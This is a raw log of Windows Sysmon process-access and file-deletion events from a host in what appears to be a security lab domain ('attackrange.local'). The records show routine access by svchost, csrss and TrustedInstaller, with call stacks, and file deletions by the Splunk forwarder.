12:02:26.975{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.944{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.944{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.944{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.944{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000006208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.944{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000006207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.944{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.929{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AEF85C924CADACD198C2D00D4E27A5F,SHA256=B843ED9DEFA57CB524D004BDEBD826888579D6229781246A0952775AFF8FA0B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.929{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=431CECC3AA1069DC341B4E83AD855352,SHA256=E3F724DBF0892EDD6FBFEA962B5A9735C61FE958FD44E349CB56CD45462044D1,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000006204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.866{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6244AB059F68D754A8699920BDEC7B10,SHA256=CE47DA81DBD665CF55B456144701B2ED4D84D29D6827DCA2EC864412FBFCCD05,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.757{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.757{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.757{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.757{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.742{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.742{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.742{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.477{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.477{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.461{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.461{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.306{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.290{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.290{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.290{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.275{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
